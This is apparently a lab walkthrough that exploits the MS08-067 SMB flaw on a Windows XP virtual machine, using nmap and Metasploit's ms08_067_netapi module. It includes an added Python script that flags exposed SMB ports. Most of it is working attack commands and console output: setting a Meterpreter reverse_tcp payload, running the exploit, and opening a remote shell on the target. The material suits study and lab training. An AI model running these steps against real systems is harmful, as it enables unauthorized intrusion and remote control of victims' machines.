This walkthrough is done on Kali Linux or BackTrack.
MS08-067 vulnerability (references):
https://technet.microsoft.com/library/security/ms08-067
https://www.rapid7.com/db/modules/exploit/windows/smb/ms08_067_netapi
Host port scan
root@kali:~# nmap -v -sT 200.200.200.44

Starting Nmap 7.01 ( https://nmap.org ) at 2016-03-16 22:01 EDT
Initiating ARP Ping Scan at 22:01
Scanning 200.200.200.44 [1 port]
Completed ARP Ping Scan at 22:01, 0.00s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 22:01
Completed Parallel DNS resolution of 1 host. at 22:01, 0.33s elapsed
Initiating Connect Scan at 22:01
Scanning 200.200.200.44 [1000 ports]
Discovered open port 445/tcp on 200.200.200.44
Discovered open port 139/tcp on 200.200.200.44
Completed Connect Scan at 22:01, 4.63s elapsed (1000 total ports)
Nmap scan report for 200.200.200.44
Host is up (0.00084s latency).
Not shown: 998 filtered ports
PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 00:0C:29:67:81:BB (VMware)

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 5.05 seconds
           Raw packets sent: 1 (28B) | Rcvd: 1 (28B)
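The scan above is the precondition for everything that follows: the MS08-067 module talks to the Server service over SMB, so a host with 139/tcp or 445/tcp open and no MS08-067 update is the exposure to look for. The following script is an added example (not from the original post, and not nmap's or Metasploit's own code) that parses nmap's normal-format output, as shown above, and lists every host with an open SMB/NetBIOS port so an administrator can check those hosts for the missing update. The sample output embedded in it is constructed to mirror the scan in the post.

```python
"""Parse nmap normal output and flag hosts with SMB/NetBIOS ports exposed.

Added example for this write-up; it is not part of the original post. The
sample output below is constructed to mirror the scan shown above (host
200.200.200.44 with 139/tcp and 445/tcp open). The regexes cover the
"Nmap scan report for ..." header and the "PORT STATE SERVICE" table rows.
"""
import re

# Constructed sample: the relevant lines of the scan from the post, one per line.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 200.200.200.44
Host is up (0.00084s latency).
Not shown: 998 filtered ports
PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 00:0C:29:67:81:BB (VMware)
Nmap done: 1 IP address (1 host up) scanned in 5.05 seconds
"""

# Ports the exploit module in the post reaches the Server service through:
# NetBIOS session (139/tcp) or direct SMB (445/tcp).
SMB_PORTS = {139, 445}

HOST_LINE = re.compile(r"^Nmap scan report for (?P<host>\S+)")
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)"
)


def parse_nmap_normal(text):
    """Return {host: [(port, proto, state, service), ...]} from nmap normal output.

    Port rows are attributed to the most recent "Nmap scan report for" header,
    so output covering several hosts is handled as well.
    """
    results = {}
    host = None
    for line in text.splitlines():
        m = HOST_LINE.match(line)
        if m:
            host = m.group("host")
            results[host] = []
            continue
        m = PORT_LINE.match(line)
        if m and host is not None:
            results[host].append(
                (int(m.group("port")), m.group("proto"), m.group("state"), m.group("service"))
            )
    return results


def smb_exposure(results):
    """List (host, port) pairs where an SMB/NetBIOS TCP port is reported open."""
    return [
        (host, port)
        for host, rows in results.items()
        for (port, proto, state, _service) in rows
        if proto == "tcp" and state == "open" and port in SMB_PORTS
    ]


if __name__ == "__main__":
    scan = parse_nmap_normal(SAMPLE_NMAP_OUTPUT)
    for host, port in smb_exposure(scan):
        print(f"{host}: {port}/tcp open - SMB reachable; verify the MS08-067 update is installed")
```

Run it against a saved `nmap -oN` file by reading the file into `parse_nmap_normal`; a host that shows up in `smb_exposure` and still runs an unpatched Windows XP SP3, as the fingerprint in the exploit output below shows, is exactly the case this post demonstrates.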
Metasploit on the attacking host
1. Run msfconsole
A database appears to be already configured, skipping initialization
(msfconsole banner ASCII art omitted)
Tired of typing 'set RHOSTS'? Click & pwn with Metasploit Pro
Learn more on http://rapid7.com/metasploit

       =[ metasploit v4.11.5-2016010401                   ]
+ -- --=[ 1517 exploits - 875 auxiliary - 257 post        ]
+ -- --=[ 437 payloads - 37 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf >
2. Load ms08_067_netapi
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) >
3. Check the options & set the target host IP
msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting

msf exploit(ms08_067_netapi) >
msf exploit(ms08_067_netapi) > set RHOST 200.200.200.44
RHOST => 200.200.200.44
msf exploit(ms08_067_netapi) >
4. Select reverse_tcp as the payload
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
5. Check the options
msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    200.200.200.44   yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting

msf exploit(ms08_067_netapi) >
6. Set the payload IP / port
. Set the listening host IP / port (the attacking host, where the reverse handler waits)
→ Any port number will do
msf exploit(ms08_067_netapi) > set LHOST 200.200.200.61
LHOST => 200.200.200.61
msf exploit(ms08_067_netapi) > set LPORT 4444
LPORT => 4444
msf exploit(ms08_067_netapi) >
7. exploit
→ A session is established with the target host
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 200.200.200.61:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:Korean
[*] Selected Target: Windows XP SP3 Korean (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (957487 bytes) to 200.200.200.44
[*] Meterpreter session 1 opened (200.200.200.61:4444 -> 200.200.200.44:4290) at 2016-03-17 11:44:25 -0400

meterpreter >
meterpreter
meterpreter > sysinfo
Computer        : KJK-9EB673B1C66
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : ko_KR
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter > ipconfig

Interface  1
============
Name         : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU          : 1520
IPv4 Address : 127.0.0.1

Interface  2
============
Name         : AMD PCNET Family PCI Ethernet Adapter
Hardware MAC : 00:0c:29:67:81:bb
MTU          : 1500
IPv4 Address : 200.200.200.44
IPv4 Netmask : 255.255.255.0

meterpreter >